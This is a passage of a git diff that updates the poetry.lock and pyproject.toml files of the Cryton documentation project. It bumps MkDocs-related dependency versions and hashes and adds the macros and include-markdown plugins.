"charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:73dc03a6a7e30b7edc5b01b601e53e7fc924b04e1835e8e407c12c037e81adbd"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6f5c2e7bc8a4bf7c426599765b1bd33217ec84023033672c1e9a8b35eaeaaaf8"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-win32.whl", hash = "sha256:12a2b561af122e3d94cdb97fe6fb2bb2b82cef0cdca131646fdb940a1eda04f0"}, + {file = "charset_normalizer-3.1.0-cp38-cp38-win_amd64.whl", hash = "sha256:3160a0fd9754aab7d47f95a6b63ab355388d890163eb03b2d2b87ab0a30cfa59"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:38e812a197bf8e71a59fe55b757a84c1f946d0ac114acafaafaf21667a7e169e"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:6baf0baf0d5d265fa7944feb9f7451cc316bfe30e8df1a61b1bb08577c554f31"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:8f25e17ab3039b05f762b0a55ae0b3632b2e073d9c8fc88e89aca31a6198e88f"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3747443b6a904001473370d7810aa19c3a180ccd52a7157aacc264a5ac79265e"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:b116502087ce8a6b7a5f1814568ccbd0e9f6cfd99948aa59b0e241dc57cf739f"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d16fd5252f883eb074ca55cb622bc0bee49b979ae4e8639fff6ca3ff44f9f854"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:21fa558996782fc226b529fdd2ed7866c2c6ec91cee82735c98a197fae39f706"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f6c7a8a57e9405cad7485f4c9d3172ae486cfef1344b5ddd8e5239582d7355e"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ac3775e3311661d4adace3697a52ac0bab17edd166087d493b52d4f4f553f9f0"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:10c93628d7497c81686e8e5e557aafa78f230cd9e77dd0c40032ef90c18f2230"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:6f4f4668e1831850ebcc2fd0b1cd11721947b6dc7c00bf1c6bd3c929ae14f2c7"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:0be65ccf618c1e7ac9b849c315cc2e8a8751d9cfdaa43027d4f6624bd587ab7e"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:53d0a3fa5f8af98a1e261de6a3943ca631c526635eb5817a87a59d9a57ebf48f"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-win32.whl", hash = "sha256:a04f86f41a8916fe45ac5024ec477f41f886b3c435da2d4e3d2709b22ab02af1"}, + {file = "charset_normalizer-3.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:830d2948a5ec37c386d3170c483063798d7879037492540f10a475e3fd6f244b"}, + {file = "charset_normalizer-3.1.0-py3-none-any.whl", hash = "sha256:3d9098b479e78c85080c98e1e35ff40b4a31d8953102bb0fd7d1b6f8a2111a3d"}, ] [[package]] @@ -346,16 +333,50 @@ watchdog = ">=2.0" i18n = ["babel (>=2.9.0)"] min-versions = ["babel (==2.9.0)", "click (==7.0)", "colorama (==0.4)", "ghp-import (==1.0)", "importlib-metadata (==4.3)", "jinja2 (==2.11.1)", "markdown (==3.2.1)", "markupsafe (==2.0.1)", "mergedeep (==1.3.4)", "packaging (==20.5)", "pyyaml (==5.1)", "pyyaml-env-tag (==0.1)", "typing-extensions (==3.10)", "watchdog (==2.0)"] +[[package]] +name = "mkdocs-include-markdown-plugin" +version = "4.0.3" +description = "Mkdocs Markdown includer plugin." +category = "main" +optional = false +python-versions = "<3.12,>=3.7" +files = [ + {file = "mkdocs_include_markdown_plugin-4.0.3-py3-none-any.whl", hash = "sha256:bea863f0f4773c2dba4524e629bed222b0ce4135bcd47fc2fc6f524384f21bd8"}, + {file = "mkdocs_include_markdown_plugin-4.0.3.tar.gz", hash = "sha256:0b98f8877a6e262a91024dae0d40597b04ebe9175f5dfdfa5796a9068e24458a"}, +] + +[[package]] +name = "mkdocs-macros-plugin" +version = "0.7.0" +description = "Unleash the power of MkDocs with macros and variables" +category = "main" +optional = false +python-versions = ">=3.5" +files = [ + {file = "mkdocs-macros-plugin-0.7.0.tar.gz", hash = "sha256:9e64e1cabcf6925359de29fe54f62d5847fb455c2528c440b87f8f1240650608"}, + {file = "mkdocs_macros_plugin-0.7.0-py3-none-any.whl", hash = "sha256:96bdabeb98b96139544f0048ea2f5cb80c7befde6b21e94c6d4596c22774cbcf"}, +] + +[package.dependencies] +jinja2 = "*" +mkdocs = ">=0.17" +python-dateutil = "*" +pyyaml = "*" +termcolor = "*" + +[package.extras] +test = ["mkdocs-include-markdown-plugin", "mkdocs-macros-test", "mkdocs-material (>=6.2)"] + [[package]] name = "mkdocs-material" -version = "9.0.14" +version = "9.1.1" description = "Documentation that simply works" category = "main" optional = false python-versions = ">=3.7" files = [ - {file = "mkdocs_material-9.0.14-py3-none-any.whl", hash = "sha256:e6b1abc3527ece8522abd8fd76bf30c535f3420b20e11095fc7a8818b31385e5"}, - {file = "mkdocs_material-9.0.14.tar.gz", hash = "sha256:eff6c2c2ebe89bb99b8bf2167f546bdd35c8d5130694d1823361d6cf9c701c22"}, + {file = "mkdocs_material-9.1.1-py3-none-any.whl", hash = "sha256:3b20d4e9ee28b2c276d391eb2c4e599ff8865e6c7dcab8146a7fd9805ca59263"}, + {file = "mkdocs_material-9.1.1.tar.gz", hash = "sha256:836f0066c9346afc05b1962c146ea097025512bbb607c5f04a38248d7415f165"}, ] [package.dependencies] @@ -410,18 +431,19 @@ plugins = ["importlib-metadata"] [[package]] name = "pymdown-extensions" -version = "9.9.2" +version = "9.10" description = "Extension pack for Python Markdown." category = "main" optional = false python-versions = ">=3.7" files = [ - {file = "pymdown_extensions-9.9.2-py3-none-any.whl", hash = "sha256:c3d804eb4a42b85bafb5f36436342a5ad38df03878bb24db8855a4aa8b08b765"}, - {file = "pymdown_extensions-9.9.2.tar.gz", hash = "sha256:ebb33069bafcb64d5f5988043331d4ea4929325dc678a6bcf247ddfcf96499f8"}, + {file = "pymdown_extensions-9.10-py3-none-any.whl", hash = "sha256:31eaa76ce6f96aabfcea98787c2fff2c5c0611b20a53a94213970cfbf05f02b8"}, + {file = "pymdown_extensions-9.10.tar.gz", hash = "sha256:562c38eee4ce3f101ce631b804bfc2177a8a76c7e4dc908871fb6741a90257a7"}, ] [package.dependencies] markdown = ">=3.2" +pyyaml = "*" [[package]] name = "python-dateutil" @@ -635,6 +657,21 @@ files = [ {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, ] +[[package]] +name = "termcolor" +version = "2.2.0" +description = "ANSI color formatting for output in terminal" +category = "main" +optional = false +python-versions = ">=3.7" +files = [ + {file = "termcolor-2.2.0-py3-none-any.whl", hash = "sha256:91ddd848e7251200eac969846cbae2dacd7d71c2871e92733289e7e3666f48e7"}, + {file = "termcolor-2.2.0.tar.gz", hash = "sha256:dfc8ac3f350788f23b2947b3e6cfa5a53b630b612e6cd8965a015a776020b99a"}, +] + +[package.extras] +tests = ["pytest", "pytest-cov"] + [[package]] name = "urllib3" version = "1.26.14" @@ -669,40 +706,40 @@ test = ["coverage", "flake8 (>=3.7)", "mypy", "pretend", "pytest"] [[package]] name = "watchdog" -version = "2.3.0" +version = "2.3.1" description = "Filesystem events monitoring" category = "main" optional = false python-versions = ">=3.6" files = [ - {file = "watchdog-2.3.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:c1b3962e5463a848ba2a342cb66c80251dca27a102933b8f38d231d2a9e5a543"}, - {file = "watchdog-2.3.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:9e651b4874477c1bf239417d43818bbfd047aaf641b029fa60d6f5109ede0db0"}, - {file = "watchdog-2.3.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:d04662017efd00a014cff9068708e085d67f2fac43f48bbbb95a7f97490487f3"}, - {file = "watchdog-2.3.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0f7d759299ce21a3d2a77e18d430c24811369c3432453701790acc6ff45a7101"}, - {file = "watchdog-2.3.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a4b9bece40d46bf6fb8621817ea7d903eae2b9b3ebac55a51ed50354a79061a8"}, - {file = "watchdog-2.3.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:242e57253e84a736e6777ba756c48cf6a68d3d90cb9e01bd6bfd371a949ace3a"}, - {file = "watchdog-2.3.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:3fa74b0ef4825f9112932675a002296cb2d3d3e400d7a44c32fafd1ecc83ada0"}, - {file = "watchdog-2.3.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:15bf5b165d7a6b48265411dad74fb0d33053f8270eb6575faad0e016035cf9f7"}, - {file = "watchdog-2.3.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:139262f678b4e6a7013261c772059bca358441de04fb0e0087489a34db9e3db0"}, - {file = "watchdog-2.3.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:8a214955769d2ef0f7aaa82f31863e3bdf6b083ce1b5f1c2e85cab0f66fba024"}, - {file = "watchdog-2.3.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4e648df44a4c6ea6da4d9eb6722745c986b9d70268f25ae60f140082d7c8908e"}, - {file = "watchdog-2.3.0-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:473164a2de473f708ca194a992466eeefff73b58273bbb88e089c5a5a98fcda1"}, - {file = "watchdog-2.3.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:ebe756f788cb130fdc5c150ea8a4fda39cb4ee3a5873a345607c8b84fecf018b"}, - {file = "watchdog-2.3.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a623de186477e9e05f8461087f856412eae5cd005cc4bcb232ed5c6f9a8709f5"}, - {file = "watchdog-2.3.0-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:43d76d7888b26850b908208bb82383a193e8b0f25d0abaa84452f191b4acdea4"}, - {file = "watchdog-2.3.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:5ddbbe87f9ed726940d174076da030cd01ec45433ef2b1b2e6094c84f2af17f1"}, - {file = "watchdog-2.3.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3fa1572f5a2f6d17d4d860edbc04488fef31b007c25c2f3b11203fb8179b7c67"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_aarch64.whl", hash = "sha256:1d9c656495172873bf1ddc7e39e80055fcdd21c4608cf68f23a28116dcba0b43"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_armv7l.whl", hash = "sha256:00f93782c67042d9525ec51628330b5faf5fb84bcb7ebaac05ea8528cfb20bba"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_i686.whl", hash = "sha256:f1a655f4a49f9232311b9967f42cc2eaf43fd4903f3bed850dd4570fda5d5eff"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_ppc64.whl", hash = "sha256:aa4773160b9cb21ba369cb42d59a947087330b3a02480173033a6a6cc137a510"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:982f5416a2817003172994d865285dd6a2b3836f033cd3fa87d1a62096a162cc"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_s390x.whl", hash = "sha256:45c13e7e6eea1013da419bf9aa9a8f5df7bbf3e5edce40bc6df84130febf39d5"}, - {file = "watchdog-2.3.0-py3-none-manylinux2014_x86_64.whl", hash = "sha256:7767a3da3307d9cf597832f692702441a97c259e5d0d560f2e57c43ad0d191d2"}, - {file = "watchdog-2.3.0-py3-none-win32.whl", hash = "sha256:8863913ea2c3f256d18c33d84546518636e391cd8f50d209b9a31221e0f7d3fd"}, - {file = "watchdog-2.3.0-py3-none-win_amd64.whl", hash = "sha256:6d79b5954db8f41d6a7f5763042b988f7a4afd40b7d141456061fa7c5b7f2159"}, - {file = "watchdog-2.3.0-py3-none-win_ia64.whl", hash = "sha256:a3559ee82a10976de1ec544b6ebe3b4aa398d491860a283d80ec0f550076d068"}, - {file = "watchdog-2.3.0.tar.gz", hash = "sha256:9d39effe6909be898ba3e7286a9e9b17a6a9f734fb1ef9dde3e9bb68715fca39"}, + {file = "watchdog-2.3.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:d1f1200d4ec53b88bf04ab636f9133cb703eb19768a39351cee649de21a33697"}, + {file = "watchdog-2.3.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:564e7739abd4bd348aeafbf71cc006b6c0ccda3160c7053c4a53b67d14091d42"}, + {file = "watchdog-2.3.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:95ad708a9454050a46f741ba5e2f3468655ea22da1114e4c40b8cbdaca572565"}, + {file = "watchdog-2.3.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:a073c91a6ef0dda488087669586768195c3080c66866144880f03445ca23ef16"}, + {file = "watchdog-2.3.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aa8b028750b43e80eea9946d01925168eeadb488dfdef1d82be4b1e28067f375"}, + {file = "watchdog-2.3.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:964fd236cd443933268ae49b59706569c8b741073dbfd7ca705492bae9d39aab"}, + {file = "watchdog-2.3.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:91fd146d723392b3e6eb1ac21f122fcce149a194a2ba0a82c5e4d0ee29cd954c"}, + {file = "watchdog-2.3.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:efe3252137392a471a2174d721e1037a0e6a5da7beb72a021e662b7000a9903f"}, + {file = "watchdog-2.3.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:85bf2263290591b7c5fa01140601b64c831be88084de41efbcba6ea289874f44"}, + {file = "watchdog-2.3.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:8f2df370cd8e4e18499dd0bfdef476431bcc396108b97195d9448d90924e3131"}, + {file = "watchdog-2.3.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:ea5d86d1bcf4a9d24610aa2f6f25492f441960cf04aed2bd9a97db439b643a7b"}, + {file = "watchdog-2.3.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:6f5d0f7eac86807275eba40b577c671b306f6f335ba63a5c5a348da151aba0fc"}, + {file = "watchdog-2.3.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:5b848c71ef2b15d0ef02f69da8cc120d335cec0ed82a3fa7779e27a5a8527225"}, + {file = "watchdog-2.3.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0d9878be36d2b9271e3abaa6f4f051b363ff54dbbe7e7df1af3c920e4311ee43"}, + {file = "watchdog-2.3.1-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:4cd61f98cb37143206818cb1786d2438626aa78d682a8f2ecee239055a9771d5"}, + {file = "watchdog-2.3.1-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:3d2dbcf1acd96e7a9c9aefed201c47c8e311075105d94ce5e899f118155709fd"}, + {file = "watchdog-2.3.1-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:03f342a9432fe08107defbe8e405a2cb922c5d00c4c6c168c68b633c64ce6190"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_aarch64.whl", hash = "sha256:7a596f9415a378d0339681efc08d2249e48975daae391d58f2e22a3673b977cf"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_armv7l.whl", hash = "sha256:0e1dd6d449267cc7d6935d7fe27ee0426af6ee16578eed93bacb1be9ff824d2d"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_i686.whl", hash = "sha256:7a1876f660e32027a1a46f8a0fa5747ad4fcf86cb451860eae61a26e102c8c79"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_ppc64.whl", hash = "sha256:2caf77ae137935c1466f8cefd4a3aec7017b6969f425d086e6a528241cba7256"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:53f3e95081280898d9e4fc51c5c69017715929e4eea1ab45801d5e903dd518ad"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_s390x.whl", hash = "sha256:9da7acb9af7e4a272089bd2af0171d23e0d6271385c51d4d9bde91fe918c53ed"}, + {file = "watchdog-2.3.1-py3-none-manylinux2014_x86_64.whl", hash = "sha256:8a4d484e846dcd75e96b96d80d80445302621be40e293bfdf34a631cab3b33dc"}, + {file = "watchdog-2.3.1-py3-none-win32.whl", hash = "sha256:a74155398434937ac2780fd257c045954de5b11b5c52fc844e2199ce3eecf4cf"}, + {file = "watchdog-2.3.1-py3-none-win_amd64.whl", hash = "sha256:5defe4f0918a2a1a4afbe4dbb967f743ac3a93d546ea4674567806375b024adb"}, + {file = "watchdog-2.3.1-py3-none-win_ia64.whl", hash = "sha256:4109cccf214b7e3462e8403ab1e5b17b302ecce6c103eb2fc3afa534a7f27b96"}, + {file = "watchdog-2.3.1.tar.gz", hash = "sha256:d9f9ed26ed22a9d331820a8432c3680707ea8b54121ddcc9dc7d9f2ceeb36906"}, ] [package.extras] @@ -710,21 +747,21 @@ watchmedo = ["PyYAML (>=3.10)"] [[package]] name = "zipp" -version = "3.14.0" +version = "3.15.0" description = "Backport of pathlib-compatible object wrapper for zip files" category = "main" optional = false python-versions = ">=3.7" files = [ - {file = "zipp-3.14.0-py3-none-any.whl", hash = "sha256:188834565033387710d046e3fe96acfc9b5e86cbca7f39ff69cf21a4128198b7"}, - {file = "zipp-3.14.0.tar.gz", hash = "sha256:9e5421e176ef5ab4c0ad896624e87a7b2f07aca746c9b2aa305952800cb8eecb"}, + {file = "zipp-3.15.0-py3-none-any.whl", hash = "sha256:48904fc76a60e542af151aded95726c1a5c34ed43ab4134b597665c86d7ad556"}, + {file = "zipp-3.15.0.tar.gz", hash = "sha256:112929ad649da941c23de50f356a2b5570c954b65150642bccdd66bf194d224b"}, ] [package.extras] docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"] -testing = ["flake8 (<5)", "func-timeout", "jaraco.functools", "jaraco.itertools", "more-itertools", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-flake8", "pytest-mypy (>=0.9.1)"] +testing = ["big-O", "flake8 (<5)", "jaraco.functools", "jaraco.itertools", "more-itertools", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-flake8", "pytest-mypy (>=0.9.1)"] [metadata] lock-version = "2.0" -python-versions = "^3.8" -content-hash = "f979b2ad978f2fe9fdcd690b9ae3543ccb5fbc55a9dc6488bd7b9c700133870b" +python-versions = ">=3.8,<3.12" +content-hash = "5fe2f09dc9052b133d98f3f9310711423a6a160fddb1158940b15f1010f13740" diff --git a/pyproject.toml b/pyproject.toml index 6d7b651b01a56b3984e0afa14899fb30ac7b039f..824805b7444420fc9173ae984883fe6c7b377a92 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [tool.poetry] name = "cryton-documentation" -version = "2023.1.0a0" +version = "2023.1.0" description = "Documentation for Cryton toolset" authors = [ "Ivo Nutár <nutar@ics.muni.cz>", @@ -23,10 +23,12 @@ keywords = [ readme = "README.md" [tool.poetry.dependencies] -python = "^3.8" +python = ">=3.8,<3.12" mkdocs = "^1.3.1" mkdocs-material = "^9.0.0" mike = "^1.1.2" +mkdocs-macros-plugin = "^0.7.0" +mkdocs-include-markdown-plugin = "^4.0.3" [tool.poetry.group.dev.dependencies]